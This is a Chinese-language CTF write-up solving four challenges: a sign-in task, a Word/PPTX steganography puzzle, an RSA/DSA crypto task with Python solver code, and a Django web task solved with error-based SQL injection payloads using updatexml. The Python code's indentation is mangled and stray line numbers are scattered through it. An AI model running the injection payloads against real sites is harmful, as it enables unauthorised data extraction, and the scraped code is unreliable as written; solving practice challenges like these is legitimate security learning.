【Misc】签名簿

随便写点东西提交就行

【Misc】办公室爱情

doc文档里面有两个密码，白色的password，全选然后改变颜色就行，这是第一段
修改后缀名为zip，打开document.xml就是所有的文字信息，很明显有两个password：
拼接起来就是密码，猜测为wbStego4open隐写，解密出来一个文件，存着压缩包密码
解压出来是一个pptx文件，彩色的幻灯片，有规律可以发现，可以确定就是七进制转十进制，最后转成ascii码就行。

s='204a213a166a205a234a100a66a226a203a164a203a231a124a203a100a164a45a45a45a236a'
for i in s.split('a'):
	print(chr(int(i,7)),end='')
1
2
3

flag{10ve_exCe1_!!!}

【Crypto】known_phi

给了n和phi，要求出n的分解。
known_phi.py
跑一遍可以得到n的分解，之后dsa求flag

from Crypto.Util.number import inverse, long_to_bytes, bytes_to_long
from hashlib import sha256
from math import gcd
# from math import isqrt
from random import randrange
from sage.all import is_prime
def factorize_multi_prime(N, phi):
    prime_factors = set()
    factors = [N]
while len(factors) > 0:
    # Element to factorize.
    N = factors[0]
    w = randrange(2, N - 1)
    i = 1
while phi % (2 ** i) == 0:
    sqrt_1 = pow(w, phi // (2 ** i), N)
if sqrt_1 > 1 and sqrt_1 != N - 1:
 # We can remove the element to factorize now, because we have a factorization.
    factors = factors[1:]
    p = gcd(N, sqrt_1 + 1)
    q = N // p


if is_prime(p):
    prime_factors.add(int(p))
elif p > 1:
    factors.append(int(p))


if is_prime(q):
    prime_factors.add(int(q))
elif q > 1:
    factors.append(int(q))


 # Continue in the outer loop
break

i += 1

return tuple(prime_factors)
n = 104228256293611313959676852310116852553951496121352860038971098657350022997841589403091722735802150153734050783858816709247647536393314564077002364012463220999962114186339228164032217361145009468516448617173972835797623658266515762201804936729547278758839604969469770650218191574897316410254695420895895051693
phi = 104228256293611313959676852310116852553951496121352860038971098657350022997837434645707418205268240995284026522165519145773852565112344453740579163420312890001524537570675468046604347184376661743552799809753709321949095844960227307733389258381950812717245522599433727311919405966404418872873961877021696812800
n_factors = factorize_multi_prime(n, phi)
q = 24513014442114004234202354110477737650785387286781126308169912007819
s1 = 764450933738974696530033347966845551587903750431946039815672438603
r1 = 8881880595434882344509893789458546908449907797285477983407324325035
r2 = 8881880595434882344509893789458546908449907797285477983407324325035
s2 = 22099482232399385060035569388467035727015978742301259782677969649659
# n_factors = (92128261871628241975522014503893089775204276818952562864868068434189077323911, 112949642503320513342506215562619543574731838853984060837858943255064878544009, 87835491118288540715995802690214012778910595141140880257454164067662889225787, 114034877389817517986186253205403596431234414440955842208884285396147740113161)
import itertools
for i in itertools.permutations([0,1,2,3]):
    m1 = long_to_bytes(n_factors[i[0]] + n_factors[i[1]])
    m2 = long_to_bytes(n_factors[i[2]] + n_factors[i[3]])
    hm1 = bytes_to_long(sha256(m1).digest())
    hm2 = bytes_to_long(sha256(m2).digest())
    k = inverse((s1-s2),q)*(hm1-hm2) % q
    x1 = (s1*k-hm1)*inverse(r1,q) % q
    x2 = (s2*k-hm2)*inverse(r2,q) % q
    if b'flag' in long_to_bytes(x1):
        print(long_to_bytes(x1))
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61

flag{ea16de7-1981-11ed-b58f}

【Web】djangogogo

打开题⽬点击submit

对name参数进⾏sql注⼊测试

sql语句报错了，存在sql注⼊
查看报错信息

(1064, "You have an error in your SQL syntax; check the manual that corresponds
to your MySQL server version for the right syntax to use near '' FROM
`Bill`.`purchase_date`))' at line 1")
1
2
3

后⾯的语句是

' FROM `Bill`.`purchase_date`))
1

尝试拼接

name=year from 1))--
1

回显正常，拼接成功
直接访问 name=month 给了提⽰

意思就是表名是flag，⼤概猜测字段也是flag
测试

year from (select flag from flag)))--
1

回显正常
sql有报错，所以直接使⽤报错注⼊了

month from (select updatexml(1, concat(1,(select flag from flag),1),1))))--
1

只看到了⼀半flag，回显有⻓短限制
逆向输出⼀下就好了

month from (select updatexml(1, concat(1,(select reverse(flag) from
flag),1),1))))--
1
2